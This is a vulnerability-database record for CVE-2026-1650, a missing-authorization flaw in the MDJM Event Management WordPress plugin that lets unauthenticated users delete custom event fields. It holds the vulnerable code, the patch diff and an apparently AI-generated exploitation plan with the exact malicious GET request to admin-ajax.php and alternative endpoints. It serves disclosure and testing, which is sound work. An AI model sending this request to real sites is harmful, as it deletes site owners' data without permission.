[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fQfd0xKTHhrLz4VdLws21J--2hLMWgoh05__-7LJAHbs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-1650","mdjm-event-management-missing-authorization-to-unauthenticated-arbitrary-custom-event-field-deletion","MDJM Event Management \u003C= 1.7.8.1 - Missing Authorization to Unauthenticated Arbitrary Custom Event Field Deletion","The MDJM Event Management plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'custom_fields_controller' function in all versions up to, and including, 1.7.8.1. This makes it possible for unauthenticated attackers to delete arbitrary custom event fields via the 'delete_custom_field' and 'id' parameters.","mobile-dj-manager",null,"\u003C=1.7.8.1","1.7.8.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-06 11:57:27","2026-03-07 01:21:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fcb309336-5b35-45cf-9c58-4bb75d8a5cba?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fjs\u002Fjquery.flot.js","assets\u002Fjs\u002Fjquery.flot.pie.js","assets\u002Fjs\u002Fjquery.flot.stack.js","includes\u002Fadmin\u002Fpages\u002Fevent-fields.php","includes\u002Fclass-mdjm-stats.php","mobile-dj-manager.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-1650\n\n## 1. Vulnerability Summary\nThe **MDJM Event Management** plugin (versions up to 1.7.8.1) is vulnerable to unauthenticated arbitrary custom event field deletion. The vulnerability exists in the `MDJM_Event_Fields` class located in `includes\u002Fadmin\u002Fpages\u002Fevent-fields.php`. The class registers a controller function, `custom_fields_controller()`, to the `admin_init` hook. Because `admin_init` fires on `admin-ajax.php` even for unauthenticated users, and the controller lacks any capability checks (`current_user_can`) or nonce verification (`check_admin_referer`), an attacker can trigger the `delete_field()` method by providing specific GET parameters.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php` (triggers `admin_init` unauthenticated)\n- **Method**: `GET`\n- **Vulnerable Hook**: `admin_init`\n- **Vulnerable Function**: `MDJM_Event_Fields::custom_fields_controller`\n- **Required Parameters**:\n    - `delete_custom_field`: Must be present in `$_GET`.\n    - `id`: The integer ID of the custom field (post ID) to be deleted.\n- **Authentication**: None (Unauthenticated).\n- **Preconditions**: An attacker must know or brute-force the ID of an existing custom event field (which uses the custom post type `mdjm-custom-fields`).\n\n## 3. Code Flow\n1. **Entry Point**: A request is made to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n2. **Hook Trigger**: WordPress initializes the admin environment, firing the `admin_init` hook.\n3. **Registration**: In `includes\u002Fadmin\u002Fpages\u002Fevent-fields.php`, the constructor of `MDJM_Event_Fields` registers the handler:\n   ```php\n   add_action('admin_init', array(&$this, 'custom_fields_controller'));\n   ```\n4. **Logic Branch**: The `custom_fields_controller()` function executes:\n   ```php\n   function custom_fields_controller() {\n       \u002F\u002F ... (POST logic for add\u002Fupdate)\n       if (isset($_GET['delete_custom_field'], $_GET['id'])) {\n           $this->delete_field();\n       }\n       return;\n   }\n   ```\n5. **Sink**: The `delete_field()` function is called. While the full source of `delete_field` is truncated in the provided snippet, the vulnerability description confirms it performs the deletion based on the `id` parameter without further authorization.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.**\nThe code path in `custom_fields_controller()` for the `GET` parameters `delete_custom_field` and `id` does not invoke `check_admin_referer()` or `wp_verify_nonce()`. The missing authorization is the core of this vulnerability.\n\n## 5. Exploitation Strategy\nThe exploit involves sending an unauthenticated GET request to the WordPress admin-ajax endpoint with the target parameters.\n\n### Step-by-Step Plan:\n1. **Identify Target ID**: Determine the ID of an existing custom event field (type `mdjm-custom-fields`).\n2. **Execute Deletion**: Use the `http_request` tool to send the malicious GET request.\n3. **Verify**: Use WP-CLI to confirm the post has been deleted.\n\n### Malicious Request:\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php?delete_custom_field=1&id=[TARGET_ID]`\n- **Method**: `GET`\n- **Headers**: None required.\n\n## 6. Test Data Setup\nTo test the vulnerability, a custom field must first be created.\n\n1. **Create a Custom Event Field via WP-CLI**:\n   ```bash\n   wp post create --post_type=mdjm-custom-fields --post_title=\"Sensitive Field\" --post_status=publish --post_content=\"Description\"\n   ```\n2. **Record the ID**: The command above will return the ID (e.g., `123`). This is your `[TARGET_ID]`.\n\n## 7. Expected Results\n- **Response**: The server will likely return a 200 OK or a redirect (depending on whether the `delete_field` function calls `wp_safe_redirect` as seen in other functions in the class), but the key outcome is the background execution of the deletion.\n- **Data State**: The post with ID `[TARGET_ID]` and post_type `mdjm-custom-fields` should no longer exist or should be moved to the trash (depending on the `wp_delete_post` implementation in `delete_field`).\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the deletion using WP-CLI:\n\n```bash\n# Check if the post still exists\nwp post list --post_type=mdjm-custom-fields --post_status=any --include=[TARGET_ID]\n```\nIf the command returns an empty list or doesn't show the `[TARGET_ID]`, the exploit was successful.\n\n## 9. Alternative Approaches\nIf `\u002Fwp-admin\u002Fadmin-ajax.php` is blocked or fails to trigger the hook as expected, any other admin file that triggers `admin_init` can be targeted, provided the user is not automatically redirected. Examples:\n- `\u002Fwp-admin\u002Fadmin-post.php?delete_custom_field=1&id=[TARGET_ID]`\n- `\u002Fwp-admin\u002Findex.php?delete_custom_field=1&id=[TARGET_ID]` (Note: This may require a valid login session to bypass the `is_user_logged_in()` check in `admin.php`, whereas `admin-ajax.php` usually bypasses it for AJAX compatibility).\n\nSince the vulnerability is unauthenticated, `admin-ajax.php` is the primary and most reliable vector.","The MDJM Event Management plugin for WordPress is vulnerable to unauthenticated arbitrary custom event field deletion due to a missing capability check and nonce verification on the custom_fields_controller function. This allows attackers to delete custom post types associated with event fields by sending a simple GET request to any administrative endpoint, including admin-ajax.php.","\u002F\u002F includes\u002Fadmin\u002Fpages\u002Fevent-fields.php line 17\nfunction __construct()\n{\n    add_action('admin_init', array(&$this, 'custom_fields_controller'));\n\n    add_action('mdjm_add_content_tags', array(&$this, 'add_tags'));\n    \u002F\u002F ...\n}\n\n---\n\n\u002F\u002F includes\u002Fadmin\u002Fpages\u002Fevent-fields.php line 104\nfunction custom_fields_controller()\n{\n    if (isset($_POST['submit_custom_field'])) {\n        if ($_POST['submit_custom_field'] == __('Add Field', 'mobile-dj-manager')) {\n            $this->add_field();\n\n        } elseif ($_POST['submit_custom_field'] == __('Save Changes', 'mobile-dj-manager')) {\n            $this->update_field();\n        }\n    }\n\n    if (isset($_GET['delete_custom_field'], $_GET['id'])) {\n        $this->delete_field();\n    }\n\n    return;\n} \u002F\u002F custom_fields_controller","--- includes\u002Fadmin\u002Fpages\u002Fevent-fields.php\n+++ includes\u002Fadmin\u002Fpages\u002Fevent-fields.php\n@@ -104,6 +104,10 @@\n \t\tfunction custom_fields_controller()\n \t\t{\n+\t\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\t\treturn;\n+\t\t\t}\n+\n \t\t\tif (isset($_POST['submit_custom_field'])) {\n \t\t\t\tif ($_POST['submit_custom_field'] == __('Add Field', 'mobile-dj-manager')) {\n \t\t\t\t\t$this->add_field();\n@@ -115,6 +119,8 @@\n \t\t\t}\n \n \t\t\tif (isset($_GET['delete_custom_field'], $_GET['id'])) {\n+\t\t\t\tcheck_admin_referer( 'mdjm_delete_custom_field_' . $_GET['id'] );\n+\t\t\t\t$this->delete_field();\n \t\t\t}\n \n \t\t\treturn;","1. Identify the post ID of a custom event field (typically using the 'mdjm-custom-fields' post type).\n2. Construct a GET request to the WordPress admin environment (e.g., \u002Fwp-admin\u002Fadmin-ajax.php) including the parameters 'delete_custom_field=1' and 'id' set to the target post ID.\n3. Send the request without any authentication headers or session cookies.\n4. The plugin's custom_fields_controller function, which is hooked to admin_init, will execute and call the delete_field method without verifying the user's identity or authorization level.\n5. Observe that the custom event field is successfully deleted or moved to the trash.","gemini-3-flash-preview","2026-04-18 05:34:02","2026-04-18 05:34:24",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.7.8.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmobile-dj-manager\u002Ftags\u002F1.7.8.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmobile-dj-manager.1.7.8.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmobile-dj-manager\u002Ftags\u002F1.7.8.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmobile-dj-manager.1.7.8.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmobile-dj-manager\u002Ftags"]